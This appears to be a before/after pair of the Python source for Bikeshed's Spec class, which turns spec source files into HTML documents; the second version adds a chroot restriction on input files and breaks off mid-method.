constants,
datablocks,
dfns,
extensions,
fingerprinting,
h,
headings,
highlight,
idl,
includes,
inlineTags,
lint,
markdown,
mdnspeclinks,
metadata,
shorthands,
wpt,
)
from .func import Functor
from .h import *
from .InputSource import FileInputSource, InputSource
from .messages import *
from .refs import ReferenceManager
from .unsortedJunk import *
class Spec:
def __init__(
self,
inputFilename,
debug=False,
token=None,
lineNumbers=False,
fileRequester=None,
testing=False,
):
self.valid = False
self.lineNumbers = lineNumbers
if lineNumbers:
# line-numbers are too hacky, so force this to be a dry run
constants.dryRun = True
if inputFilename is None:
inputFilename = findImplicitInputFile()
if inputFilename is None: # still
die(
"No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN."
)
return
self.inputSource = InputSource(inputFilename)
self.transitiveDependencies = set()
self.debug = debug
self.token = token
self.testing = testing
if fileRequester is None:
self.dataFile = config.defaultRequester
else:
self.dataFile = fileRequester
self.md = None
self.mdBaseline = None
self.mdDocument = None
self.mdCommandLine = None
self.mdDefaults = None
self.mdOverridingDefaults = None
self.lines = []
self.document = None
self.html = None
self.head = None
self.body = None
self.fillContainers = None
self.valid = self.initializeState()
def initializeState(self):
self.normativeRefs = {}
self.informativeRefs = {}
self.refs = ReferenceManager(fileRequester=self.dataFile, testing=self.testing)
self.externalRefsUsed = defaultdict(lambda: defaultdict(dict))
self.md = None
self.mdBaseline = metadata.MetadataManager()
self.mdDocument = None
self.mdCommandLine = metadata.MetadataManager()
self.mdDefaults = None
self.mdOverridingDefaults = None
self.biblios = {}
self.typeExpansions = {}
self.macros = defaultdict(lambda x: "???")
self.canIUse = {}
self.mdnSpecLinks = {}
self.widl = idl.getParser()
self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True))
self.languages = json.loads(self.dataFile.fetch("languages.json", str=True))
self.extraStyles = defaultdict(str)
self.extraStyles["style-colors"] = styleColors
self.extraStyles["style-darkmode"] = styleDarkMode
self.extraStyles["style-md-lists"] = styleMdLists
self.extraStyles["style-autolinks"] = styleAutolinks
self.extraStyles["style-selflinks"] = styleSelflinks
self.extraStyles["style-counters"] = styleCounters
self.extraScripts = defaultdict(str)
try:
inputContent = self.inputSource.read()
self.lines = inputContent.lines
if inputContent.date is not None:
self.mdBaseline.addParsedData("Date", inputContent.date)
except FileNotFoundError:
die(
"Couldn't find the input file at the specified location '{0}'.",
self.inputSource,
)
return False
except OSError:
die("Couldn't open the input file '{0}'.", self.inputSource)
return False
return True
def recordDependencies(self, *inputSources):
self.transitiveDependencies.update(inputSources)
def preprocess(self):
self.transitiveDependencies.clear()
self.assembleDocument()
self.processDocument()
def assembleDocument(self):
# Textual hacks
stripBOM(self)
if self.lineNumbers:
self.lines = hackyLineNumbers(self.lines)
self.lines = markdown.stripComments(self.lines)
self.recordDependencies(self.inputSource)
# Extract and process metadata
self.lines, self.mdDocument = metadata.parse(lines=self.lines)
# First load the metadata sources from 'local' data
self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine)
# Using that to determine the Group and Status, load the correct defaults.include boilerplate
self.mdDefaults = metadata.fromJson(
data=config.retrieveBoilerplateFile(self, "defaults", error=True),
source="defaults",
)
self.md = metadata.join(
self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine
)
# Using all of that, load up the text macros so I can sub them into the computed-metadata file.
self.md.fillTextMacros(self.macros, doc=self)
jsonEscapedMacros = {k: json.dumps(v)[1:-1] for k, v in self.macros.items()}
computedMdText = replaceMacros(
config.retrieveBoilerplateFile(self, "computed-metadata", error=True),
macros=jsonEscapedMacros,
)
self.mdOverridingDefaults = metadata.fromJson(
data=computedMdText, source="computed-metadata"
)
self.md = metadata.join(
self.mdBaseline,
self.mdDefaults,
self.mdOverridingDefaults,
self.mdDocument,
self.mdCommandLine,
)
# Finally, compute the "implicit" things.
self.md.computeImplicitMetadata(doc=self)
# And compute macros again, in case the preceding steps changed them.
self.md.fillTextMacros(self.macros, doc=self)
self.md.validate()
extensions.load(self)
# Initialize things
self.refs.initializeRefs(self)
self.refs.initializeBiblio()
# Deal with further <pre> blocks, and markdown
self.lines = datablocks.transformDataBlocks(self, self.lines)
self.lines = markdown.parse(
self.lines,
self.md.indent,
opaqueElements=self.md.opaqueElements,
blockElements=self.md.blockElements,
)
# Note that, currently, markdown.parse returns an array of strings, not of Line objects.
self.refs.setSpecData(self.md)
# Convert to a single string of html now, for convenience.
self.html = "".join(line.text for line in self.lines)
boilerplate.addHeaderFooter(self)
self.html = self.fixText(self.html)
# Build the document
self.document = parseDocument(self.html)
self.head = find("head", self)
self.body = find("body", self)
correctH1(self)
includes.processInclusions(self)
metadata.parseDoc(self)
def processDocument(self):
# Fill in and clean up a bunch of data
conditional.processConditionals(self)
self.fillContainers = locateFillContainers(self)
lint.exampleIDs(self)
boilerplate.addBikeshedVersion(self)
boilerplate.addCanonicalURL(self)
boilerplate.addFavicon(self)
boilerplate.addSpecVersion(self)
boilerplate.addStatusSection(self)
boilerplate.addLogo(self)
boilerplate.addCopyright(self)
boilerplate.addSpecMetadataSection(self)
boilerplate.addAbstract(self)
boilerplate.addExpiryNotice(self)
boilerplate.addObsoletionNotice(self)
boilerplate.addAtRisk(self)
addNoteHeaders(self)
boilerplate.removeUnwantedBoilerplate(self)
wpt.processWptElements(self)
shorthands.run(self)
inlineTags.processTags(self)
canonicalizeShortcuts(self)
addImplicitAlgorithms(self)
fixManualDefTables(self)
headings.processHeadings(self)
checkVarHygiene(self)
processIssuesAndExamples(self)
idl.markupIDL(self)
inlineRemoteIssues(self)
addImageSize(self)
# Handle all the links
processBiblioLinks(self)
processDfns(self)
idl.processIDL(self)
dfns.annotateDfns(self)
formatArgumentdefTables(self)
formatElementdefTables(self)
processAutolinks(self)
biblio.dedupBiblioReferences(self)
verifyUsageOfAllLocalBiblios(self)
caniuse.addCanIUsePanels(self)
boilerplate.addIndexSection(self)
boilerplate.addExplicitIndexes(self)
boilerplate.addStyles(self)
boilerplate.addReferencesSection(self)
boilerplate.addPropertyIndex(self)
boilerplate.addIDLSection(self)
boilerplate.addIssuesSection(self)
boilerplate.addCustomBoilerplate(self)
headings.processHeadings(self, "all") # again
boilerplate.removeUnwantedBoilerplate(self)
boilerplate.addTOCSection(self)
addSelfLinks(self)
processAutolinks(self)
boilerplate.addAnnotations(self)
boilerplate.removeUnwantedBoilerplate(self)
# Add MDN panels after all IDs/anchors have been added
mdnspeclinks.addMdnPanels(self)
highlight.addSyntaxHighlighting(self)
boilerplate.addBikeshedBoilerplate(self)
fingerprinting.addTrackingVector(self)
fixIntraDocumentReferences(self)
fixInterDocumentReferences(self)
removeMultipleLinks(self)
forceCrossorigin(self)
lint.brokenLinks(self)
lint.accidental2119(self)
lint.missingExposed(self)
lint.requiredIDs(self)
lint.unusedInternalDfns(self)
# Any final HTML cleanups
cleanupHTML(self)
if self.md.prepTR:
# Don't try and override the W3C's icon.
for el in findAll("[rel ~= 'icon']", self):
removeNode(el)
# Make sure the W3C stylesheet is after all other styles.
for el in findAll("link", self):
if el.get("href").startswith("https://www.w3.org/StyleSheets/TR"):
appendChild(find("head", self), el)
# Ensure that all W3C links are https.
for el in findAll("a", self):
href = el.get("href", "")
if href.startswith("http://www.w3.org") or href.startswith(
"http://lists.w3.org"
):
el.set("href", "https" + href[4:])
text = el.text or ""
if text.startswith("http://www.w3.org") or text.startswith(
"http://lists.w3.org"
):
el.text = "https" + text[4:]
# Loaded from .include files
extensions.BSPrepTR(self) # pylint: disable=no-member
return self
def serialize(self):
try:
rendered = h.Serializer(
self.md.opaqueElements, self.md.blockElements
).serialize(self.document)
except Exception as e:
die("{0}", e)
return
rendered = finalHackyCleanup(rendered)
return rendered
def fixMissingOutputFilename(self, outputFilename):
if outputFilename is None:
# More sensible defaults!
if not isinstance(self.inputSource, FileInputSource):
outputFilename = "-"
elif self.inputSource.sourceName.endswith(".bs"):
outputFilename = self.inputSource.sourceName[0:-3] + ".html"
elif self.inputSource.sourceName.endswith(".src.html"):
outputFilename = self.inputSource.sourceName[0:-9] + ".html"
else:
outputFilename = "-"
return outputFilename
def finish(self, outputFilename=None, newline=None):
self.printResultMessage()
outputFilename = self.fixMissingOutputFilename(outputFilename)
rendered = self.serialize()
if not constants.dryRun:
try:
if outputFilename == "-":
sys.stdout.write(rendered)
else:
with open(
outputFilename, "w", encoding="utf-8", newline=newline
) as f:
f.write(rendered)
except Exception as e:
die(
"Something prevented me from saving the output document to {0}:\n{1}",
outputFilename,
e,
)
def printResultMessage(self):
# If I reach this point, I've succeeded, but maybe with reservations.
fatals = messageCounts["fatal"]
links = messageCounts["linkerror"]
warnings = messageCounts["warning"]
if self.lineNumbers:
warn("Because --line-numbers was used, no output was saved.")
if fatals:
success("Successfully generated, but fatal errors were suppressed")
return
if links:
success("Successfully generated, with {0} linking errors", links)
return
if warnings:
success("Successfully generated, with warnings")
return
def watch(self, outputFilename, port=None, localhost=False):
import time
outputFilename = self.fixMissingOutputFilename(outputFilename)
if self.inputSource.mtime() is None:
die(f"Watch mode doesn't support {self.inputSource}")
if outputFilename == "-":
die("Watch mode doesn't support streaming to STDOUT.")
return
if port:
# Serve the folder on an HTTP server
import http.server
import socketserver
import threading
class SilentServer(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(
("localhost" if localhost else "", port), SilentServer
)
print(f"Serving at port {port}")
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
else:
server = None
mdCommandLine = self.mdCommandLine
try:
self.preprocess()
self.finish(outputFilename)
lastInputModified = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
try:
while True:
# Comparing mtimes with "!=" handles when a file starts or
# stops existing, and it's fine to rebuild if an mtime
# somehow gets older.
if any(
input.mtime() != lastModified
for input, lastModified in lastInputModified.items()
):
resetSeenMessages()
p("Source file modified. Rebuilding...")
self.initializeState()
self.mdCommandLine = mdCommandLine
self.preprocess()
self.finish(outputFilename)
lastInputModified = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
time.sleep(1)
except KeyboardInterrupt:
p("Exiting~")
if server:
server.shutdown()
thread.join()
sys.exit(0)
except Exception as e:
die("Something went wrong while watching the file:\n{0}", e)
def fixText(self, text, moreMacros={}):
# Do several textual replacements that need to happen *before* the document is parsed as h.
# If markdown shorthands are on, remove all `foo`s while processing,
# so their contents don't accidentally trigger other stuff.
# Also handle markdown escapes.
if "markdown" in self.md.markupShorthands:
textFunctor = MarkdownCodeSpans(text)
else:
textFunctor = Functor(text)
macros = dict(self.macros, **moreMacros)
textFunctor = textFunctor.map(curry(replaceMacros, macros=macros))
textFunctor = textFunctor.map(fixTypography)
if "css" in self.md.markupShorthands:
textFunctor = textFunctor.map(replaceAwkwardCSSShorthands)
return textFunctor.extract()
def printTargets(self):
p("Exported terms:")
for el in findAll("[data-export]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
p("Unexported terms:")
for el in findAll("[data-noexport]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
def isOpaqueElement(self, el):
if el.tag in self.md.opaqueElements:
return True
if el.get("data-opaque") is not None:
return True
return False
def findImplicitInputFile():
"""
Find what input file the user *probably* wants to use,
by scanning the current folder.
In preference order:
1. index.bs
2. Overview.bs
3. the first file with a .bs extension
4. the first file with a .src.html extension
"""
if os.path.isfile("index.bs"):
return "index.bs"
if os.path.isfile("Overview.bs"):
return "Overview.bs"
allBs = glob.glob("*.bs")
if allBs:
return allBs[0]
allHtml = glob.glob("*.src.html")
if allHtml:
return allHtml[0]
return None
constants.specClass = Spec
styleColors = """
/* Any --*-text not paired with a --*-bg is assumed to have a transparent bg */
:root {
color-scheme: light dark;
--text: black;
--bg: white;
--unofficial-watermark: url(https://www.w3.org/StyleSheets/TR/2016/logos/UD-watermark);
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-text: white;
--tocnav-normal-text: #707070;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-text: var(--tocnav-normal-text);
--tocnav-hover-bg: #f8f8f8;
--tocnav-active-text: #c00;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-text: var(--text);
--tocsidebar-bg: #f7f8f9;
--tocsidebar-shadow: rgba(0,0,0,.1);
--tocsidebar-heading-text: hsla(203,20%,40%,.7);
--toclink-text: var(--text);
--toclink-underline: #3980b5;
--toclink-visited-text: var(--toclink-text);
--toclink-visited-underline: #054572;
--heading-text: #005a9c;
--hr-text: var(--text);
--algo-border: #def;
--del-text: red;
--del-bg: transparent;
--ins-text: #080;
--ins-bg: transparent;
--a-normal-text: #034575;
--a-normal-underline: #bbb;
--a-visited-text: var(--a-normal-text);
--a-visited-underline: #707070;
--a-hover-bg: rgba(75%, 75%, 75%, .25);
--a-active-text: #c00;
--a-active-underline: #c00;
--blockquote-border: silver;
--blockquote-bg: transparent;
--blockquote-text: currentcolor;
--issue-border: #e05252;
--issue-bg: #fbe9e9;
--issue-text: var(--text);
--issueheading-text: #831616;
--example-border: #e0cb52;
--example-bg: #fcfaee;
--example-text: var(--text);
--exampleheading-text: #574b0f;
--note-border: #52e052;
--note-bg: #e9fbe9;
--note-text: var(--text);
--noteheading-text: hsl(120, 70%, 30%);
--notesummary-underline: silver;
--assertion-border: #aaa;
--assertion-bg: #eee;
--assertion-text: black;
--advisement-border: orange;
--advisement-bg: #fec;
--advisement-text: var(--text);
--advisementheading-text: #b35f00;
--warning-border: red;
--warning-bg: hsla(40,100%,50%,0.95);
--warning-text: var(--text);
--amendment-border: #330099;
--amendment-bg: #F5F0FF;
--amendment-text: var(--text);
--amendmentheading-text: #220066;
--def-border: #8ccbf2;
--def-bg: #def;
--def-text: var(--text);
--defrow-border: #bbd7e9;
--datacell-border: silver;
--indexinfo-text: #707070;
--indextable-hover-text: black;
--indextable-hover-bg: #f7f8f9;
--outdatedspec-bg: rgba(0, 0, 0, .5);
--outdatedspec-text: black;
--outdated-bg: maroon;
--outdated-text: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}"""
styleDarkMode = """
@media (prefers-color-scheme: dark) {
:root {
--text: #ddd;
--bg: black;
--unofficial-watermark: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='400' height='400'%3E%3Cg fill='%23100808' transform='translate(200 200) rotate(-45) translate(-200 -200)' stroke='%23100808' stroke-width='3'%3E%3Ctext x='50%25' y='220' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EUNOFFICIAL%3C/text%3E%3Ctext x='50%25' y='305' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EDRAFT%3C/text%3E%3C/g%3E%3C/svg%3E");
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-text: white;
--tocnav-normal-text: #999;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-text: var(--tocnav-normal-text);
--tocnav-hover-bg: #080808;
--tocnav-active-text: #f44;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-text: var(--text);
--tocsidebar-bg: #080808;
--tocsidebar-shadow: rgba(255,255,255,.1);
--tocsidebar-heading-text: hsla(203,20%,40%,.7);
--toclink-text: var(--text);
--toclink-underline: #6af;
--toclink-visited-text: var(--toclink-text);
--toclink-visited-underline: #054572;
--heading-text: #8af;
--hr-text: var(--text);
--algo-border: #456;
--del-text: #f44;
--del-bg: transparent;
--ins-text: #4a4;
--ins-bg: transparent;
--a-normal-text: #6af;
--a-normal-underline: #555;
--a-visited-text: var(--a-normal-text);
--a-visited-underline: var(--a-normal-underline);
--a-hover-bg: rgba(25%, 25%, 25%, .2);
--a-active-text: #f44;
--a-active-underline: var(--a-active-text);
--borderedblock-bg: rgba(255, 255, 255, .05);
--blockquote-border: silver;
--blockquote-bg: var(--borderedblock-bg);
--blockquote-text: currentcolor;
--issue-border: #e05252;
--issue-bg: var(--borderedblock-bg);
--issue-text: var(--text);
--issueheading-text: hsl(0deg, 70%, 70%);
--example-border: hsl(50deg, 90%, 60%);
--example-bg: var(--borderedblock-bg);
--example-text: var(--text);
--exampleheading-text: hsl(50deg, 70%, 70%);
--note-border: hsl(120deg, 100%, 35%);
--note-bg: var(--borderedblock-bg);
--note-text: var(--text);
--noteheading-text: hsl(120, 70%, 70%);
--notesummary-underline: silver;
--assertion-border: #444;
--assertion-bg: var(--borderedblock-bg);
--assertion-text: var(--text);
--advisement-border: orange;
--advisement-bg: #222218;
--advisement-text: var(--text);
--advisementheading-text: #f84;
--warning-border: red;
--warning-bg: hsla(40,100%,20%,0.95);
--warning-text: var(--text);
--amendment-border: #330099;
--amendment-bg: #080010;
--amendment-text: var(--text);
--amendmentheading-text: #cc00ff;
--def-border: #8ccbf2;
--def-bg: #080818;
--def-text: var(--text);
--defrow-border: #136;
--datacell-border: silver;
--indexinfo-text: #aaa;
--indextable-hover-text: var(--text);
--indextable-hover-bg: #181818;
--outdatedspec-bg: rgba(255, 255, 255, .5);
--outdatedspec-text: black;
--outdated-bg: maroon;
--outdated-text: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}
/* In case a transparent-bg image doesn't expect to be on a dark bg,
which is quite common in practice... */
img { background: white; }
}"""
styleMdLists = """
/* This is a weird hack for me not yet following the commonmark spec
regarding paragraph and lists. */
[data-md] > :first-child {
margin-top: 0;
}
[data-md] > :last-child {
margin-bottom: 0;
}"""
styleAutolinks = """
.css.css, .property.property, .descriptor.descriptor {
color: var(--a-normal-text);
font-size: inherit;
font-family: inherit;
}
.css::before, .property::before, .descriptor::before {
content: "‘";
}
.css::after, .property::after, .descriptor::after {
content: "’";
}
.property, .descriptor {
/* Don't wrap property and descriptor names */
white-space: nowrap;
}
.type { /* CSS value <type> */
font-style: italic;
}
pre .property::before, pre .property::after {
content: "";
}
[data-link-type="property"]::before,
[data-link-type="propdesc"]::before,
[data-link-type="descriptor"]::before,
[data-link-type="value"]::before,
[data-link-type="function"]::before,
[data-link-type="at-rule"]::before,
[data-link-type="selector"]::before,
[data-link-type="maybe"]::before {
content: "‘";
}
[data-link-type="property"]::after,
[data-link-type="propdesc"]::after,
[data-link-type="descriptor"]::after,
[data-link-type="value"]::after,
[data-link-type="function"]::after,
[data-link-type="at-rule"]::after,
[data-link-type="selector"]::after,
[data-link-type="maybe"]::after {
content: "’";
}
[data-link-type].production::before,
[data-link-type].production::after,
.prod [data-link-type]::before,
.prod [data-link-type]::after {
content: "";
}
[data-link-type=element],
[data-link-type=element-attr] {
font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace;
font-size: .9em;
}
[data-link-type=element]::before { content: "<" }
[data-link-type=element]::after { content: ">" }
[data-link-type=biblio] {
white-space: pre;
}"""
styleSelflinks = """
:root {
--selflink-text: white;
--selflink-bg: gray;
--selflink-hover-text: black;
}
.heading, .issue, .note, .example, li, dt {
position: relative;
}
a.self-link {
position: absolute;
top: 0;
left: calc(-1 * (3.5rem - 26px));
width: calc(3.5rem - 26px);
height: 2em;
text-align: center;
border: none;
transition: opacity .2s;
opacity: .5;
}
a.self-link:hover {
opacity: 1;
}
.heading > a.self-link {
font-size: 83%;
}
li > a.self-link {
left: calc(-1 * (3.5rem - 26px) - 2em);
}
dfn > a.self-link {
top: auto;
left: auto;
opacity: 0;
width: 1.5em;
height: 1.5em;
background: var(--selflink-bg);
color: var(--selflink-text);
font-style: normal;
transition: opacity .2s, background-color .2s, color .2s;
}
dfn:hover > a.self-link {
opacity: 1;
}
dfn > a.self-link:hover {
color: var(--selflink-hover-text);
}
a.self-link::before { content: "¶"; }
.heading > a.self-link::before { content: "§"; }
dfn > a.self-link::before { content: "#"; }
"""
styleDarkMode += """
@media (prefers-color-scheme: dark) {
:root {
--selflink-text: black;
--selflink-bg: silver;
--selflink-hover-text: white;
}
}
"""
styleCounters = """
body {
counter-reset: example figure issue;
}
.issue {
counter-increment: issue;
}
.issue:not(.no-marker)::before {
content: "Issue " counter(issue);
}
.example {
counter-increment: example;
}
.example:not(.no-marker)::before {
content: "Example " counter(example);
}
.invalid.example:not(.no-marker)::before,
.illegal.example:not(.no-marker)::before {
content: "Invalid Example" counter(example);
}
figcaption {
counter-increment: figure;
}
figcaption:not(.no-marker)::before {
content: "Figure " counter(figure) " ";
}"""
| import glob
import os
import sys
from collections import defaultdict
from functools import partial as curry
from . import (
biblio,
boilerplate,
caniuse,
conditional,
config,
constants,
datablocks,
dfns,
extensions,
fingerprinting,
h,
headings,
highlight,
idl,
includes,
inlineTags,
lint,
markdown,
mdnspeclinks,
metadata,
shorthands,
wpt,
)
from .func import Functor
from .h import *
from .InputSource import FileInputSource, InputSource
from .messages import *
from .refs import ReferenceManager
from .unsortedJunk import *
class Spec:
def __init__(
self,
inputFilename,
debug=False,
token=None,
lineNumbers=False,
fileRequester=None,
testing=False,
):
self.valid = False
self.lineNumbers = lineNumbers
if lineNumbers:
# line-numbers are too hacky, so force this to be a dry run
constants.dryRun = True
if inputFilename is None:
inputFilename = findImplicitInputFile()
if inputFilename is None: # still
die(
"No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN."
)
return
self.inputSource = InputSource(inputFilename, chroot=constants.chroot)
self.transitiveDependencies = set()
self.debug = debug
self.token = token
self.testing = testing
if fileRequester is None:
self.dataFile = config.defaultRequester
else:
self.dataFile = fileRequester
self.md = None
self.mdBaseline = None
self.mdDocument = None
self.mdCommandLine = None
self.mdDefaults = None
self.mdOverridingDefaults = None
self.lines = []
self.document = None
self.html = None
self.head = None
self.body = None
self.fillContainers = None
self.valid = self.initializeState()
def initializeState(self):
self.normativeRefs = {}
self.informativeRefs = {}
self.refs = ReferenceManager(fileRequester=self.dataFile, testing=self.testing)
self.externalRefsUsed = defaultdict(lambda: defaultdict(dict))
self.md = None
self.mdBaseline = metadata.MetadataManager()
self.mdDocument = None
self.mdCommandLine = metadata.MetadataManager()
self.mdDefaults = None
self.mdOverridingDefaults = None
self.biblios = {}
self.typeExpansions = {}
self.macros = defaultdict(lambda x: "???")
self.canIUse = {}
self.mdnSpecLinks = {}
self.widl = idl.getParser()
self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True))
self.languages = json.loads(self.dataFile.fetch("languages.json", str=True))
self.extraStyles = defaultdict(str)
self.extraStyles["style-colors"] = styleColors
self.extraStyles["style-darkmode"] = styleDarkMode
self.extraStyles["style-md-lists"] = styleMdLists
self.extraStyles["style-autolinks"] = styleAutolinks
self.extraStyles["style-selflinks"] = styleSelflinks
self.extraStyles["style-counters"] = styleCounters
self.extraScripts = defaultdict(str)
try:
inputContent = self.inputSource.read()
self.lines = inputContent.lines
if inputContent.date is not None:
self.mdBaseline.addParsedData("Date", inputContent.date)
except FileNotFoundError:
die(
"Couldn't find the input file at the specified location '{0}'.",
self.inputSource,
)
return False
except OSError:
die("Couldn't open the input file '{0}'.", self.inputSource)
return False
return True
def recordDependencies(self, *inputSources):
self.transitiveDependencies.update(inputSources)
def preprocess(self):
self.transitiveDependencies.clear()
self.assembleDocument()
self.processDocument()
def assembleDocument(self):
# Textual hacks
stripBOM(self)
if self.lineNumbers:
self.lines = hackyLineNumbers(self.lines)
self.lines = markdown.stripComments(self.lines)
self.recordDependencies(self.inputSource)
# Extract and process metadata
self.lines, self.mdDocument = metadata.parse(lines=self.lines)
# First load the metadata sources from 'local' data
self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine)
# Using that to determine the Group and Status, load the correct defaults.include boilerplate
self.mdDefaults = metadata.fromJson(
data=config.retrieveBoilerplateFile(self, "defaults", error=True),
source="defaults",
)
self.md = metadata.join(
self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine
)
# Using all of that, load up the text macros so I can sub them into the computed-metadata file.
self.md.fillTextMacros(self.macros, doc=self)
jsonEscapedMacros = {k: json.dumps(v)[1:-1] for k, v in self.macros.items()}
computedMdText = replaceMacros(
config.retrieveBoilerplateFile(self, "computed-metadata", error=True),
macros=jsonEscapedMacros,
)
self.mdOverridingDefaults = metadata.fromJson(
data=computedMdText, source="computed-metadata"
)
self.md = metadata.join(
self.mdBaseline,
self.mdDefaults,
self.mdOverridingDefaults,
self.mdDocument,
self.mdCommandLine,
)
# Finally, compute the "implicit" things.
self.md.computeImplicitMetadata(doc=self)
# And compute macros again, in case the preceding steps changed them.
self.md.fillTextMacros(self.macros, doc=self)
self.md.validate()
extensions.load(self)
# Initialize things
self.refs.initializeRefs(self)
self.refs.initializeBiblio()
# Deal with further <pre> blocks, and markdown
self.lines = datablocks.transformDataBlocks(self, self.lines)
self.lines = markdown.parse(
self.lines,
self.md.indent,
opaqueElements=self.md.opaqueElements,
blockElements=self.md.blockElements,
)
# Note that, currently, markdown.parse returns an array of strings, not of Line objects.
self.refs.setSpecData(self.md)
# Convert to a single string of html now, for convenience.
self.html = "".join(line.text for line in self.lines)
boilerplate.addHeaderFooter(self)
self.html = self.fixText(self.html)
# Build the document
self.document = parseDocument(self.html)
self.head = find("head", self)
self.body = find("body", self)
correctH1(self)
includes.processInclusions(self)
metadata.parseDoc(self)
def processDocument(self):
# Fill in and clean up a bunch of data
conditional.processConditionals(self)
self.fillContainers = locateFillContainers(self)
lint.exampleIDs(self)
boilerplate.addBikeshedVersion(self)
boilerplate.addCanonicalURL(self)
boilerplate.addFavicon(self)
boilerplate.addSpecVersion(self)
boilerplate.addStatusSection(self)
boilerplate.addLogo(self)
boilerplate.addCopyright(self)
boilerplate.addSpecMetadataSection(self)
boilerplate.addAbstract(self)
boilerplate.addExpiryNotice(self)
boilerplate.addObsoletionNotice(self)
boilerplate.addAtRisk(self)
addNoteHeaders(self)
boilerplate.removeUnwantedBoilerplate(self)
wpt.processWptElements(self)
shorthands.run(self)
inlineTags.processTags(self)
canonicalizeShortcuts(self)
addImplicitAlgorithms(self)
fixManualDefTables(self)
headings.processHeadings(self)
checkVarHygiene(self)
processIssuesAndExamples(self)
idl.markupIDL(self)
inlineRemoteIssues(self)
addImageSize(self)
# Handle all the links
processBiblioLinks(self)
processDfns(self)
idl.processIDL(self)
dfns.annotateDfns(self)
formatArgumentdefTables(self)
formatElementdefTables(self)
processAutolinks(self)
biblio.dedupBiblioReferences(self)
verifyUsageOfAllLocalBiblios(self)
caniuse.addCanIUsePanels(self)
boilerplate.addIndexSection(self)
boilerplate.addExplicitIndexes(self)
boilerplate.addStyles(self)
boilerplate.addReferencesSection(self)
boilerplate.addPropertyIndex(self)
boilerplate.addIDLSection(self)
boilerplate.addIssuesSection(self)
boilerplate.addCustomBoilerplate(self)
headings.processHeadings(self, "all") # again
boilerplate.removeUnwantedBoilerplate(self)
boilerplate.addTOCSection(self)
addSelfLinks(self)
processAutolinks(self)
boilerplate.addAnnotations(self)
boilerplate.removeUnwantedBoilerplate(self)
# Add MDN panels after all IDs/anchors have been added
mdnspeclinks.addMdnPanels(self)
highlight.addSyntaxHighlighting(self)
boilerplate.addBikeshedBoilerplate(self)
fingerprinting.addTrackingVector(self)
fixIntraDocumentReferences(self)
fixInterDocumentReferences(self)
removeMultipleLinks(self)
forceCrossorigin(self)
lint.brokenLinks(self)
lint.accidental2119(self)
lint.missingExposed(self)
lint.requiredIDs(self)
lint.unusedInternalDfns(self)
# Any final HTML cleanups
cleanupHTML(self)
if self.md.prepTR:
# Don't try and override the W3C's icon.
for el in findAll("[rel ~= 'icon']", self):
removeNode(el)
# Make sure the W3C stylesheet is after all other styles.
for el in findAll("link", self):
if el.get("href").startswith("https://www.w3.org/StyleSheets/TR"):
appendChild(find("head", self), el)
# Ensure that all W3C links are https.
for el in findAll("a", self):
href = el.get("href", "")
if href.startswith("http://www.w3.org") or href.startswith(
"http://lists.w3.org"
):
el.set("href", "https" + href[4:])
text = el.text or ""
if text.startswith("http://www.w3.org") or text.startswith(
"http://lists.w3.org"
):
el.text = "https" + text[4:]
# Loaded from .include files
extensions.BSPrepTR(self) # pylint: disable=no-member
return self
def serialize(self):
try:
rendered = h.Serializer(
self.md.opaqueElements, self.md.blockElements
).serialize(self.document)
except Exception as e:
die("{0}", e)
return
rendered = finalHackyCleanup(rendered)
return rendered
def fixMissingOutputFilename(self, outputFilename):
if outputFilename is None:
# More sensible defaults!
if not isinstance(self.inputSource, FileInputSource):
outputFilename = "-"
elif self.inputSource.sourceName.endswith(".bs"):
outputFilename = self.inputSource.sourceName[0:-3] + ".html"
elif self.inputSource.sourceName.endswith(".src.html"):
outputFilename = self.inputSource.sourceName[0:-9] + ".html"
else:
outputFilename = "-"
return outputFilename
def finish(self, outputFilename=None, newline=None):
self.printResultMessage()
outputFilename = self.fixMissingOutputFilename(outputFilename)
rendered = self.serialize()
if not constants.dryRun:
try:
if outputFilename == "-":
sys.stdout.write(rendered)
else:
with open(
outputFilename, "w", encoding="utf-8", newline=newline
) as f:
f.write(rendered)
except Exception as e:
die(
"Something prevented me from saving the output document to {0}:\n{1}",
outputFilename,
e,
)
def printResultMessage(self):
# If I reach this point, I've succeeded, but maybe with reservations.
fatals = messageCounts["fatal"]
links = messageCounts["linkerror"]
warnings = messageCounts["warning"]
if self.lineNumbers:
warn("Because --line-numbers was used, no output was saved.")
if fatals:
success("Successfully generated, but fatal errors were suppressed")
return
if links:
success("Successfully generated, with {0} linking errors", links)
return
if warnings:
success("Successfully generated, with warnings")
return
def watch(self, outputFilename, port=None, localhost=False):
import time
outputFilename = self.fixMissingOutputFilename(outputFilename)
if self.inputSource.mtime() is None:
die(f"Watch mode doesn't support {self.inputSource}")
if outputFilename == "-":
die("Watch mode doesn't support streaming to STDOUT.")
return
if port:
# Serve the folder on an HTTP server
import http.server
import socketserver
import threading
class SilentServer(http.server.SimpleHTTPRequestHandler):
